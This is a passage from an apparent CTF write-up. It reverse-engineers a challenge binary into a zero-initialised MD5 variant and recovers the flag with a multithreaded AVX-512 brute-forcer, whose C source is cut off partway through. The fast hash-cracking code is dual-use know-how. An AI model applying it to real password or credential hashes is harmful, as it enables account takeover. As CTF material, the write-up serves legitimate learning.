A[0] A[6] = A[5] + A[81] A[4] = A[6] + A[17] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 22) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[82] A[4] = A[6] + A[18] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 7) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[83] A[4] = A[6] + A[19] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 12) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[84] A[4] = A[6] + A[20] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 17) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[85] A[4] = A[6] + A[21] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 22) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[86] A[4] = A[6] + A[22] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 7) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[87] A[4] = A[6] + A[23] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 12) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[88] A[4] = A[6] + A[24] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 17) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] &amp; A[2] A[6] = A[1] ^ A[9] A[7] = A[6] &amp; A[3] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[89] A[4] = A[6] + A[25] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 22) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[75] A[4] = A[6] + A[26] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 5) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[80] A[4] = A[6] + A[27] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 9) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[85] A[4] = A[6] + A[28] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 14) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[74] A[4] = A[6] + A[29] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 20) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[79] A[4] = A[6] + A[30] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 5) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[84] A[4] = A[6] + A[31] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 9) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[89] A[4] = A[6] + A[32] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 14) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[78] A[4] = A[6] + A[33] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 20) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[83] A[4] = A[6] + A[34] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 5) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[88] A[4] = A[6] + A[35] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 9) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[77] A[4] = A[6] + A[36] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 14) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[82] A[4] = A[6] + A[37] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 20) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[87] A[4] = A[6] + A[38] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 5) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[76] A[4] = A[6] + A[39] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 9) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[81] A[4] = A[6] + A[40] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 14) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] &amp; A[1] A[6] = A[3] ^ A[9] A[7] = A[6] &amp; A[2] A[4] = A[5] | A[7] A[5] = A[4] + A[0] A[6] = A[5] + A[86] A[4] = A[6] + A[41] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 20) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[79] A[4] = A[6] + A[42] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 4) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[82] A[4] = A[6] + A[43] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 11) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[85] A[4] = A[6] + A[44] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 16) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[88] A[4] = A[6] + A[45] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 23) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[75] A[4] = A[6] + A[46] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 4) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[78] A[4] = A[6] + A[47] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 11) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[81] A[4] = A[6] + A[48] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 16) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[84] A[4] = A[6] + A[49] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 23) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[87] A[4] = A[6] + A[50] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 4) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[74] A[4] = A[6] + A[51] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 11) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[77] A[4] = A[6] + A[52] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 16) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[80] A[4] = A[6] + A[53] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 23) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[83] A[4] = A[6] + A[54] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 4) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[86] A[4] = A[6] + A[55] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 11) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[89] A[4] = A[6] + A[56] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 16) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[1] ^ A[2] A[4] = A[5] ^ A[3] A[5] = A[4] + A[0] A[6] = A[5] + A[76] A[4] = A[6] + A[57] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 23) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[74] A[4] = A[6] + A[58] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 6) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[81] A[4] = A[6] + A[59] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 10) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[88] A[4] = A[6] + A[60] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 15) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[79] A[4] = A[6] + A[61] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 21) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[86] A[4] = A[6] + A[62] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 6) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[77] A[4] = A[6] + A[63] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 10) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[84] A[4] = A[6] + A[64] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 15) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[75] A[4] = A[6] + A[65] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 21) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[82] A[4] = A[6] + A[66] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 6) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[89] A[4] = A[6] + A[67] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 10) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[80] A[4] = A[6] + A[68] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 15) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[87] A[4] = A[6] + A[69] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 21) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[78] A[4] = A[6] + A[70] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 6) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[85] A[4] = A[6] + A[71] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 10) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[76] A[4] = A[6] + A[72] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 15) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[3] ^ A[9] A[6] = A[5] | A[1] A[4] = A[2] ^ A[6] A[5] = A[4] + A[0] A[6] = A[5] + A[83] A[4] = A[6] + A[73] A[0] = A[3] | A[8] A[3] = A[2] | A[8] A[2] = A[1] | A[8] A[6] = rotl(A[4] | A[8], 21) A[7] = A[6] + A[1] A[1] = A[7] | A[8] A[5] = A[125] + A[0] A[0] = A[5] | A[8] A[5] = A[126] + A[1] A[1] = A[5] | A[8] A[5] = A[127] + A[2] A[2] = A[5] | A[8] A[5] = A[128] + A[3] A[3] = A[5] | A[8] Failing with z3 The last thing to do now was to pass everything into z3, and boom get the flag… right? Well, it turned out not to be that simple. I had z3 running for a half an hour but still no output, so what was going on? I went back to the Ghidra decompilation for any clues to make it go faster. Apparently, I had missed something; a reference to __ctype_b_loc() in the code. __ctype_b_loc() is a libc function that is used in the implementations of certain C functions like isalpha() and isdigit(). More specifically, it returns a const unsigned short int* ctype_b_values[] where each entry contains a 16-bit bitmask in which the nth bit encodes the return value of one of the is*****() functions. Where is this used, you may ask? After the long stream of if statements, the program iterates through each byte of the flag (inside corctf{...}), and terminates the loop early if (ctype_b_values[flag[i]] &amp; 8) == 0. The 3rd bit corresponds to isalnum(), and a set bit means that the byte is alphanumeric. Therefore, the flag has to be alphanumeric. I applied this new constraint to z3 hoping it would output a solution this time, but was gutted to find that it still, would not budge. However, this presents some new useful information; the brute force calculation is not 69,833,729,609,375, but 50*62^6 = 2,840,011,779,200. That’s nearly a 25x improvement, but still no easy task. Even if each of the 865 instructions I would have to execute accounted for one clock cycle, it would still take 2,840,011,779,200 * 865 / (2*10^9) / 60 / 60 ~ 341 hours on a typical 2 GHz computer. At this point we had 14 hours left to the CTF, and it was also 3AM so I wanted to go to sleep. As one final effort for the night, I Googled one of the mysterious hexadecimal constants in the code to see if anything would pop up. I wasn’t expecting any results, until I started seeing MD5 pop up! Could it be that this entire program was implementing MD5? Indeed after testing the program with different inputs, it was in fact MD5, but not entirely. Normally, the MD5 state is initialized to 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476, but in the program these are all set to zero. Let’s just call this variant MD5-0. In any case, I went to sleep with this knowledge hoping to crack this the next day. The next day (I woke up bright and early at 11AM the next morning) Since no preimage attack on MD5 is known, the only option was to brute force MD5-0 over 2,840,011,779,200 possibilities, where the correct flag should produce a suffix of 19c603ba14353ce4. To test the feasibility of the brute force, I grabbed an online C implementation of MD5 and measured its speed. The baseline single-threaded performance on my machine reached around 8*10^6 hashes per second. While this seemed relatively fast to me, the actual running time on 4 cores would be a daunting 2,840,011,779,200 / (8*10^6) / 60 / 60 / 4 ~ 25 hours. Optimizing the program by making use of the fact that the flag was always 11 bytes long and unrolling all of the loops, I was still only able to reach 1.3*10^7 hashes per second, or 15 hours. Still not nearly fast enough! Vectorization is OP A common “cheat” to magically increase a program’s speed is by using x86 SIMD instructions to perform vectorized operations on more than 64 bits at a time. Luckily, my computer supported AVX-512, an instruction set that allows performing 16 32-bit operations in parallel. I wrote a new MD5 implementation from scratch utilizing these instructions called md5_avx512, which could hash 16 11-byte strings. I was expecting maybe a 4-8x speedup, but it ended up being able to computer hashes 16x faster, which is the theoretical optimum! This brought the estimated time to just under an hour, which might just be fast enough. By the time I finished writing the program, we only had one hour left on the clock. Regardless, I ran the program and waited for a miracle. Unfortunately, it took longer than expected, as it had only reached halfway done with only 10 minutes left on the clock. I held out for a clutch victory, but it did not come. Two stupid bugs After the CTF concluded I kept my program running, but it actually finished without finding any solution! To my (annoyed) disbelief, I ended up making two stupid bugs. One of which was using the flipped endianness for the target suffix, and the other was applying #pragma omp parallel for without realizing that it was overwriting variables between threads! After fixing these bugs, I was at last able to run the multi-threaded, AVX-512 optimized MD5-0 brute forcer without any issues: // gcc -O3 -march=native -o brute brute.c &amp;&amp; ./brute #include &lt;immintrin.h&gt; #include &lt;pthread.h&gt; #include &lt;stdio.h&gt; #include &lt;stdint.h&gt; #include &lt;string.h&gt; #define AVX512_F 0xca #define AVX512_G 0xe4 #define AVX512_H 0x96 #define AVX512_I 0x39 #define AVX512_STEP(f, a, b, c, d, r, k) { \ (a) = _mm512_add_epi32((a), _mm512_add_epi32(_mm512_ternarylogic_epi32((b), (c), (d), (f)), (k))); \ (a) = _mm512_add_epi32(_mm512_rol_epi32((a), (r)), (b)); \ } #define T0 0xba03c619 #define T1 0xe43c3514 static uint32_t md5_avx512(__m512i x0, __m512i x1, __m512i x2) { __m512i a = _mm512_setzero_si512(); __m512i b = _mm512_setzero_si512(); __m512i c = _mm512_setzero_si512(); __m512i d = _mm512_setzero_si512(); // Round 1 AVX512_STEP(AVX512_F, a, b, c, d, 7, _mm512_add_epi32(x0, _mm512_set1_epi32(0xd76aa478))); AVX512_STEP(AVX512_F, d, a, b, c, 12, _mm512_add_epi32(x1, _mm512_set1_epi32(0xe8c7b756))); AVX512_STEP(AVX512_F, c, d, a, b, 17, _mm512_add_epi32(x2, _mm512_set1_epi32(0x242070db))); AVX512_STEP(AVX512_F, b, c, d, a, 22, _mm512_set1_epi32(0xc1bdceee)); AVX512_STEP(AVX512_F, a, b, c, d, 7, _mm512_set1_epi32(0xf57c0faf)); AVX512_STEP(AVX512_F, d, a, b, c, 12, _mm512_set1_epi32(0x4787c62a)); AVX512_STEP(AVX512_F, c, d, a, b, 17, _mm512_set1_epi32(0xa8304613)); AVX512_STEP(AVX512_F, b, c, d, a, 22, _mm512_set1_epi32(0xfd469501)); AVX512_STEP(AVX512_F, a, b, c, d, 7, _mm512_set1_epi32(0x698098d8)); AVX512_STEP(AVX512_F, d, a, b, c, 12, _mm512_set1_epi32(0x8b44f7af)); AVX512_STEP(AVX512_F, c, d, a, b, 17, _mm512_set1_epi32(0xffff5bb1)); AVX512_STEP(AVX512_F, b, c, d, a, 22, _mm512_set1_epi32(0x895cd7be)); AVX512_STEP(AVX512_F, a, b, c, d, 7, _mm512_set1_epi32(0x6b901122)); AVX512_STEP(AVX512_F, d, a, b, c, 12, _mm512_set1_epi32(0xfd987193)); AVX512_STEP(AVX512_F, c, d, a, b, 17, _mm512_set1_epi32(0xa67943e6)); AVX512_STEP(AVX512_F, b, c, d, a, 22, _mm512_set1_epi32(0x49b40821)); // Round 2 AVX512_STEP(AVX512_G, a, b, c, d, 5, _mm512_add_epi32(x1, _mm512_set1_epi32(0xf61e2562))); AVX512_STEP(AVX512_G, d, a, b, c, 9, _mm512_set1_epi32(0xc040b340)); AVX512_STEP(AVX512_G, c, d, a, b, 14, _mm512_set1_epi32(0x265e5a51)); AVX512_STEP(AVX512_G, b, c, d, a, 20, _mm512_add_epi32(x0, _mm512_set1_epi32(0xe9b6c7aa))); AVX512_STEP(AVX512_G, a, b, c, d, 5, _mm512_set1_epi32(0xd62f105d)); AVX512_STEP(AVX512_G, d, a, b, c, 9, _mm512_set1_epi32(0x02441453)); AVX512_STEP(AVX512_G, c, d, a, b, 14, _mm512_set1_epi32(0xd8a1e681)); AVX512_STEP(AVX512_G, b, c, d, a, 20, _mm512_set1_epi32(0xe7d3fbc8)); AVX512_STEP(AVX512_G, a, b, c, d, 5, _mm512_set1_epi32(0x21e1cde6)); AVX512_STEP(AVX512_G, d, a, b, c, 9, _mm512_set1_epi32(0xc337082e)); AVX512_STEP(AVX512_G, c, d, a, b, 14, _mm512_set1_epi32(0xf4d50d87)); AVX512_STEP(AVX512_G, b, c, d, a, 20, _mm512_set1_epi32(0x455a14ed)); AVX512_STEP(AVX512_G, a, b, c, d, 5, _mm512_set1_epi32(0xa9e3e905)); AVX512_STEP(AVX512_G, d, a, b, c, 9, _mm512_add_epi32(x2, _mm512_set1_epi32(0xfcefa3f8))); AVX512_STEP(AVX512_G, c, d, a, b, 14, _mm512_set1_epi32(0x676f02d9)); AVX512_STEP(AVX512_G, b, c, d, a, 20, _mm512_set1_epi32(0x8d2a4c8a)); // Round 3 AVX512_STEP(AVX512_H, a, b, c, d, 4, _mm512_set1_epi32(0xfffa3942)); AVX512_STEP(AVX512_H, d, a, b, c, 11, _mm512_set1_epi32(0x8771f681)); AVX512_STEP(AVX512_H, c, d, a, b, 16, _mm512_set1_epi32(0x6d9d6122)); AVX512_STEP(AVX512_H, b, c, d, a, 23, _mm512_set1_epi32(0xfde53864)); AVX512_STEP(AVX512_H, a, b, c, d, 4, _mm512_add_epi32(x1, _mm512_set1_epi32(0xa4beea44))); AVX512_STEP(AVX512_H, d, a, b, c, 11, _mm512_set1_epi32(0x4bdecfa9)); AVX512_STEP(AVX512_H, c, d, a, b, 16, _mm512_set1_epi32(0xf6bb4b60)); AVX512_STEP(AVX512_H, b, c, d, a, 23, _mm512_set1_epi32(0xbebfbc70)); AVX512_STEP(AVX512_H, a, b, c, d, 4, _mm512_set1_epi32(0x289b7ec6)); AVX512_STEP(AVX512_H, d, a, b, c, 11, _mm512_add_epi32(x0, _mm512_set1_epi32(0xeaa127fa))); AVX512_STEP(AVX512_H, c, d, a, b, 16, _mm512_set1_epi32(0xd4ef3085)); AVX512_STEP(AVX512_H, b, c, d, a, 23, _mm512_set1_epi32(0x04881d05)); AVX512_STEP(AVX512_H, a, b, c, d, 4, _mm512_set1_epi32(0xd9d4d039)); AVX512_STEP(AVX512_H, d, a, b, c, 11, _mm512_set1_epi32(0xe6db99e5)); AVX512_STEP(AVX512_H, c, d, a, b, 16, _mm512_set1_epi32(0x1fa27cf8)); AVX512_STEP(AVX512_H, b, c, d, a, 23, _mm512_add_epi32(x2, _mm512_set1_epi32(0xc4ac5665))); // Round 4 AVX512_STEP(AVX512_I, a, b, c, d, 6, 